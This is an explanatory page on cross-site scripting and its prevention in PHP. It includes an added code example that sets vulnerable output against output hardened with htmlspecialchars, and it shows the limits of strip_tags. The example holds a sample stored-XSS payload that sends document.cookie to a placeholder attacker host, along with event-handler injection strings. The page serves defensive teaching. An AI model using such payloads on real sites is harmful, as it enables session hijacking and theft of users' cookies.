XSS Exploits
Cross-site scripting (XSS) is one of the most common forms of Web site hacking. The attacker submits content to a site that contains client-side script (usually JavaScript) mixed in with ordinary text, and the site stores or reflects that content without encoding it.
When another user visits a page that includes the submitted content, the script is delivered to that user's browser together with the page and runs there with the privileges of the site.
In this kind of attack the user's cookies and session identifier can be read by the injected script and sent to a site the attacker controls.
The user may instead be redirected to a Web site of the attacker's choosing.
XSS is also used for account hijacking: once the attacker has the value of the session cookie, he can present it to the site and be treated as if he were the real user.
Prevention of XSS Exploits
XSS vulnerabilities can be avoided by HTML-encoding every piece of user-supplied content at the point where it is written into the page, so that <, >, &, " and ' become the entities &lt;, &gt;, &amp;, &quot; and &#039; and are displayed rather than parsed by the browser. Online forums typically avoid accepting raw HTML from users by offering BBCode instead: the BBCode tags are translated to a fixed set of HTML elements by the site, and everything else in the post is escaped. The htmlspecialchars() function does this conversion in PHP. Before PHP 8.1 it leaves single quotes alone by default, so pass ENT_QUOTES as its second argument to convert single quotes as well; this matters when the value lands inside a single-quoted attribute. (From PHP 8.1 on, ENT_QUOTES | ENT_SUBSTITUTE | ENT_HTML401 is the default.) The strip_tags() function removes PHP and HTML tags from a string, but it is not a substitute for encoding: it does not modify the attributes of any tags you choose to allow, so an onmouseover= or similar event handler on an allowed tag survives it. Marking the session cookie HttpOnly additionally keeps script from reading it through document.cookie, although it does not stop an injected script from making requests as the logged-in user.
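The following is an added example, not code from the original page: a stored-XSS comment page written first with raw output and then hardened with htmlspecialchars(), plus a demonstration of the strip_tags() limitation. It ties together the cookie-theft attack described in the introduction and the prevention advice above. The submitted comment is constructed for the example and the host name attacker.example is a placeholder.

```php
<?php
// Added example (not from the original page): a comment page that echoes
// user content, first unsafely and then hardened.

// Constructed sample of what an attacker submits as a "comment". The script
// reads the victim's cookies and sends them to the attacker's host
// (attacker.example is a placeholder name).
$submittedComment = '<script>'
    . 'new Image().src="https://attacker.example/steal?c="'
    . '+encodeURIComponent(document.cookie);'
    . '</script>';

// Vulnerable: user-supplied content is written straight into the page, so the
// browser sees a live <script> element and runs it for every visitor.
function render_comment_vulnerable(string $comment): string
{
    return "<div class=\"comment\">$comment</div>";
}

// Hardened: encode <, >, &, " and ' as HTML entities before output.
// ENT_QUOTES also encodes single quotes, ENT_SUBSTITUTE replaces invalid UTF-8
// instead of returning an empty string, and the charset is given explicitly.
function render_comment_safe(string $comment): string
{
    $encoded = htmlspecialchars($comment, ENT_QUOTES | ENT_SUBSTITUTE, 'UTF-8');
    return "<div class=\"comment\">$encoded</div>";
}

// Attribute context: the value lands inside title='...'. ENT_QUOTES is what
// prevents a single quote in the value from closing the attribute early.
function render_title_attr(string $value): string
{
    $encoded = htmlspecialchars($value, ENT_QUOTES | ENT_SUBSTITUTE, 'UTF-8');
    return "<a href=\"/profile\" title='$encoded'>profile</a>";
}

// strip_tags() removes tags, but attributes on the tags you allow are kept
// untouched, so an event handler on an allowed <b> survives.
function strip_with_allowed_bold(string $value): string
{
    return strip_tags($value, '<b>');
}

echo render_comment_vulnerable($submittedComment), PHP_EOL;
echo render_comment_safe($submittedComment), PHP_EOL;
echo render_title_attr("' onmouseover='alert(1)"), PHP_EOL;
echo strip_with_allowed_bold('<b onmouseover="alert(1)">hi</b>'), PHP_EOL;
```

In the hardened output the angle brackets and quotes of the payload come out as entities, so the browser displays the comment as text and nothing executes; in the attribute case the injected single quote is encoded and cannot break out of title='...'. The last line shows why strip_tags() alone is not a fix: the allowed <b> tag is kept together with its onmouseover attribute.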